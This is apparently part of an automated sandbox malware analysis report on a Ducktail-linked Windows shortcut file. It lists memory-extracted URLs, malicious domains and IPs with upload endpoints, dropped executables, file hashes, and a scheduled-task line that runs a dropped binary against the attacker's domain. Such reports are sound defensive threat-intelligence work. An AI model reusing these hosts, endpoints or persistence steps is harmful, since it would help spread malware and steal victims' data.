https://github.com/Pester/Pester	powershell.exe, 00000007.00000002.4000632893.00000279131E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.4347645237.000001C022FDD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.htmlXz	powershell.exe, 00000002.00000002.3880486051.000001A0D3D2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.4109159534.000001BAC2EDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.4109159534.000001BAC2F95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4000632893.0000027911F79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.4347645237.000001C022FDD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.cq-	powershell.exe, 00000007.00000002.4043091425.000002792A308000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.microsof	powershell.exe, 00000007.00000002.4043091425.000002792A2E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000007.00000002.4000632893.0000027912BDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4000632893.0000027911F79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.4347645237.000001C02332E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/nativeaot-compatibilityY	svczHost.exe, 00000014.00000002.5375048755.00007FF64743B000.00000002.00000001.01000000.00000009.sdmp	false		high
https://github.com/Pester/Pesterh	powershell.exe, 00000002.00000002.3880486051.000001A0D4E80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3880486051.000001A0D4E9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4000632893.000002791320F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4000632893.00000279131E3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoft.c	powershell.exe, 00000002.00000002.3899389741.000001A0EBF1D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.quovadis.bm0	powershell.exe, 00000002.00000002.3898320173.000001A0EBC48000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.4206777413.000001BADACD0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4041179833.0000027929E4A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.4891586599.000001C03AE0E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.4914809725.000001C03C287000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.5367966996.000001B556A24000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.5363571234.0000026463B1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.openxml	powershell.exe, 00000007.00000002.4046461207.000002792A7DA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/09/policyet	svchost.exe, 00000012.00000002.5366704450.000001B556313000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.microsofa	powershell.exe, 00000007.00000002.4043091425.000002792A2E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cocomethode.de/file2/30bb492ec87899a2b4a8fa5c9eeec469631d83b6fb1545c37afc33eb58d196c823652f5	powershell.exe, 0000000C.00000002.4347645237.000001C0231BF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://pesterbdd.com/images/Pester.pngXz	powershell.exe, 00000002.00000002.3880486051.000001A0D3D2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.4109159534.000001BAC2EDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.4109159534.000001BAC2F95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4000632893.0000027911F79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.4347645237.000001C022FDD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://html4/loose.dtd	powershell.exe, 0000000C.00000002.4814981767.000001C03383E000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.5367418387.0000026468346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.5375048755.00007FF64743B000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
https://cocomethode.de/file3/873ce3957d5a52b126e489a7be00fe0d36246171918182ebc53aea442d8cc4681e33dca	powershell.exe, 00000003.00000002.4109159534.000001BAC30A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/Zd(	powershell.exe, 00000003.00000002.4109159534.000001BAC2EDC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://aka.ms/nativeaot-c	svczHost.exe, myRdpService.exe	false		high
https://cocomethode.de	powershell.exe, 00000003.00000002.4109159534.000001BAC2F95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4000632893.0000027911F79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4000632893.000002791298A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.4347645237.000001C0248E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.4347645237.000001C023182000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.o#	powershell.exe, 00000007.00000002.4046461207.000002792A7DA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cocomethode.de/file2/d46efe1d23678ba9d4ecd017493c103a4e1	powershell.exe, 00000003.00000002.4109159534.000001BAC4630000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contoso.com/License	powershell.exe, 0000000C.00000002.4814981767.000001C032E27000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cocomethode.de/file2/d46efe1d23678ba9d4ecd017493c103a4e1a37d96d59b89e6acdf96bc49b073190f78c9	powershell.exe, 00000007.00000002.4000632893.000002791298A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/02/scin	svchost.exe, 00000012.00000002.5366704450.000001B556313000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust	svchost.exe, 00000012.00000002.5366704450.000001B556313000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.5366821786.000001B556337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.5367119107.000001B55636D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4067023578.000001B556352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.5366938746.000001B556353000.00000004.00000020.00020000.00000000.sdmp	false		high
http://.css	powershell.exe, 0000000C.00000002.4814981767.000001C03383E000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.5367418387.0000026468346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.5375048755.00007FF64743B000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
https://cocomethode.de/file2/1bca4c734b4173186ced83141684d6931c1b339cc16a8c5dcf14200f847129d1c5737fa	powershell.exe, 00000003.00000002.4109159534.000001BAC30A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/dotnet/runtime	powershell.exe, 0000000C.00000002.4814981767.000001C0330C0000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.5367418387.0000026467A48000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.5375048755.00007FF647322000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000000.4325699293.00007FF647322000.00000002.00000001.01000000.00000009.sdmp	false		high
https://aka.ms/dotnet-warnings/	powershell.exe, 0000000C.00000002.4814981767.000001C0330C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.4814981767.000001C03383E000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000014.00000002.5367418387.0000026467A48000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.5367418387.0000026468346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.5375048755.00007FF64743B000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000002.5375048755.00007FF647322000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000014.00000000.4325699293.00007FF647322000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe	false		high
https://account.live.com/inlinesignup.aspx?iww=1&id=80600;	svchost.exe, 00000012.00000002.5364163021.000001B555A40000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000C.00000002.4814981767.000001C032E27000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/PesterXz	powershell.exe, 00000002.00000002.3880486051.000001A0D3D2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.4109159534.000001BAC2EDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.4109159534.000001BAC2F95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4000632893.0000027911F79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.4347645237.000001C022FDD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	svchost.exe, 00000012.00000002.5365368942.000001B555AC4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ocsp.quovadisoffshore.com0	powershell.exe, 00000002.00000002.3898320173.000001A0EBC48000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.4206777413.000001BADACD0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4041179833.0000027929E4A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.4891586599.000001C03AE0E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.4914809725.000001C03C287000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.5367966996.000001B556A24000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.5363571234.0000026463B1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596bae5c01e61a6904	powershell.exe, 00000003.00000002.4109159534.000001BAC30A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://.jpg	powershell.exe, 0000000C.00000002.4814981767.000001C03383E000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.5367418387.0000026468346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.5375048755.00007FF64743B000.00000002.00000001.01000000.00000009.sdmp	false	Avira URL Cloud: safe	unknown
https://signup.live.com/signup.aspx	svchost.exe, 00000012.00000002.5364163021.000001B555A40000.00000004.00000020.00020000.00000000.sdmp	false		high
http://Passport.NET/STS%3C/ds:KeyName%3E	svchost.exe, 00000012.00000002.5365931182.000001B555B13000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.3895073118.000001A0E3B81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3895073118.000001A0E3CB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3880486051.000001A0D4FF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.4198168194.000001BAD2EB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.4198168194.000001BAD2D25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4000632893.0000027913359000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4035721658.0000027921D86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.4814981767.000001C032E27000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000007.00000002.4000632893.0000027913115000.00000004.00000800.00020000.00000000.sdmp	false		high
https://account.live.com/inlinesignup.aspx?iww=1&id=80603	svchost.exe, 00000012.00000003.4054818863.000001B55632C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.5365566202.000001B555B02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4055066251.000001B55632C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/09/policy	svchost.exe, 00000012.00000002.5367119107.000001B55636D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4067023578.000001B556352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.5366938746.000001B556353000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	svchost.exe, 00000012.00000002.5366821786.000001B556337000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cocomethode.de/file2/8a84c3609323de6cd9c25a1851d0dcd8a2f3b09776bf8e7d4d6402a6720c1add89a23d5	powershell.exe, 0000000C.00000002.4347645237.000001C022DB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.4347645237.000001C022FDD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://pesterbdd.com/images/Pester.pngh	powershell.exe, 00000002.00000002.3880486051.000001A0D4E80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3880486051.000001A0D4E9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4000632893.000002791320F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4000632893.00000279131E3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80605	svchost.exe, 00000012.00000003.4054818863.000001B55632C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4055066251.000001B55632C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4054818863.000001B556329000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.live.com/inlinesignup.aspx?iww=1&id=80604	svchost.exe, 00000012.00000003.4054818863.000001B55632C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4055066251.000001B55632C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://cocomethode.de:443/	svczHost.exe, 00000014.00000002.5365455806.00000264670A8000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000014.00000002.5365455806.00000264670AE000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596bae6d8d447eefbc	powershell.exe, 00000003.00000002.4109159534.000001BAC30A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://account.live.com/	svchost.exe, 00000012.00000002.5365566202.000001B555B02000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cocomethode.de/file2/b0c	powershell.exe, 00000003.00000002.4109159534.000001BAC4630000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.m	powershell.exe, 00000007.00000002.4043091425.000002792A308000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.live.com/Wizard/Password/Change?id=80601	svchost.exe, 00000012.00000003.4054818863.000001B55632C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4054972970.000001B55634B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.5364163021.000001B555A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4067023578.000001B556352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.5366938746.000001B556353000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc	svchost.exe, 00000012.00000002.5367119107.000001B55636D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.4067023578.000001B556352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.5366938746.000001B556353000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.88.71.29	unknown	United States		18978	ENZUINC-US	false
172.67.128.139	cocomethode.de	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1573011
Start date and time:	2024-12-11 12:41:58 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected VM Detection
Number of analysed new started processes analysed:	56
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	m9c7iq9nzP.lnk
Detection:	MAL
Classification:	mal100.troj.expl.evad.winLNK@82/63@1/2
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): RuntimeBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 52.109.8.89, 52.111.236.23, 52.113.194.132, 40.126.29.5, 20.190.157.2, 40.126.29.13, 40.126.29.10, 20.190.157.12, 40.126.29.14, 40.126.29.9, 20.190.157.14, 104.208.16.88, 142.250.105.94
Excluded domains from analysis (whitelisted): ecs.office.com, self-events-data.trafficmanager.net, prdv4a.aadg.msidentity.com, prod.configsvc1.live.com.akadns.net, www.tm.v4.a.prd.aadg.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, cus-config.officeapps.live.com, s-0005-office.config.skype.com, onedscolprdcus08.centralus.cloudapp.azure.com, prod.nexusrules.live.com.akadns.net, login.msa.msidentity.com, ecs-office.s-0005.s-msedge.net, s-0005.s-msedge.net, login.live.com, config.officeapps.live.com, us.configsvc1.live.com.akadns.net, officeclient.microsoft.com, ecs.office.trafficmanager.net, www.gstatic.com, nexusrules.officeapps.live.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Execution Graph export aborted for target myRdpService.exe, PID 4644 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 1976 because it is empty
Execution Graph export aborted for target powershell.exe, PID 2720 because it is empty
Execution Graph export aborted for target powershell.exe, PID 3152 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4212 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6280 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6760 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8012 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8496 because it is empty
Execution Graph export aborted for target svczHost.exe, PID 9124 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: m9c7iq9nzP.lnk

Simulations

Behavior and APIs

Time	Type	Description
06:43:58	API Interceptor	1797x Sleep call for process: powershell.exe modified
06:46:20	API Interceptor	8x Sleep call for process: myRdpService.exe modified
12:44:43	Task Scheduler	Run new task: zServicecakoi10 path: C:\Windows\Temp\svczHost.exe s>cakoi10 cocomethode.de

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.88.71.29	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2
	0A3NB8ot11.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
	kingsmaker_4.ca.ps1	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/command/ws
	kingsmaker_6.ca.ps1	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2
	kingsmaker.ca.ps1	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
	Job Description.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2
	Emloyment Form.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
	Company Booklet.lnk.download.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
172.67.128.139	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse	cocomethode.de/api/check
	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse	cocomethode.de/api/check
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse	cocomethode.de/api/check
	MdmRznA6gx.lnk	Get hash	malicious	Ducktail	Browse	cocomethode.de/api/check
	Cj3OWJHzls.lnk	Get hash	malicious	Ducktail	Browse	cocomethode.de/api/check
	3y37oMIUy6.lnk	Get hash	malicious	Ducktail	Browse	cocomethode.de/api/check
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse	cocomethode.de/api/check

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cocomethode.de	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	0A3NB8ot11.lnk	Get hash	malicious	Ducktail	Browse	104.21.1.51
	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	MdmRznA6gx.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	Cj3OWJHzls.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	3y37oMIUy6.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse	104.21.1.51
	0A3NB8ot11.lnk	Get hash	malicious	Ducktail	Browse	104.21.1.51

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	0A3NB8ot11.lnk	Get hash	malicious	Ducktail	Browse	104.21.1.51
	http://balmyrind.com/	Get hash	malicious	Unknown	Browse	1.1.1.1
	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	print preview.js	Get hash	malicious	FormBook	Browse	172.67.187.200
	MdmRznA6gx.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	Cj3OWJHzls.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	3y37oMIUy6.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
ENZUINC-US	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29
	0A3NB8ot11.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29
	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	104.203.163.1
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	104.202.51.86
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	23.89.70.126
	loligang.spc.elf	Get hash	malicious	Mirai	Browse	104.202.0.10
	kingsmaker_4.ca.ps1	Get hash	malicious	Ducktail	Browse	23.88.71.29
	kingsmaker_6.ca.ps1	Get hash	malicious	Ducktail	Browse	23.88.71.29

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	0A3NB8ot11.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	print preview.js	Get hash	malicious	FormBook	Browse	172.67.128.139
	MdmRznA6gx.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	Cj3OWJHzls.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	3y37oMIUy6.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139
	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse	172.67.128.139

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\Temp\myRdpService.exe	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse
	0A3NB8ot11.lnk	Get hash	malicious	Ducktail	Browse
	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse
C:\Windows\Temp\svczHost.exe	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse
	0A3NB8ot11.lnk	Get hash	malicious	Ducktail	Browse
	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse
	MdmRznA6gx.lnk	Get hash	malicious	Ducktail	Browse
	Cj3OWJHzls.lnk	Get hash	malicious	Ducktail	Browse
	3y37oMIUy6.lnk	Get hash	malicious	Ducktail	Browse
	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse
	0A3NB8ot11.lnk	Get hash	malicious	Ducktail	Browse

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	118
Entropy (8bit):	3.5700810731231707
Encrypted:	false
SSDEEP:	3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
MD5:	573220372DA4ED487441611079B623CD
SHA1:	8F9D967AC6EF34640F1F0845214FBC6994C0CB80
SHA-256:	BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
SHA-512:	F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	20051
Entropy (8bit):	5.024314565257015
Encrypted:	false
SSDEEP:	384:Prib43WKmVoGIpN6KQkj2Fkjh4iUxDhQIe3zUpX+OdBNNXp5yvOjJlYoaYpib47:PRWKmV3IpNBQkj2Uh4iUxDhi3zUpX+Oh
MD5:	41A553659658912065E8C36A0986B3FC
SHA1:	4375322340AD922F4527F413F686054324D4A839
SHA-256:	BF150150AC83E00846E4165E426DD8D3D0B5B357F1BE43168DBB3073EDE74B01
SHA-512:	FD5DE346A92BEFF1789369FAEB2F28F4D900288CBEABBC3ADD41E6AB7C693ABA34024441FE0127EF5286F47EE8392C09324B3E1913B0B27392FB2A0683E506A5
Malicious:	false
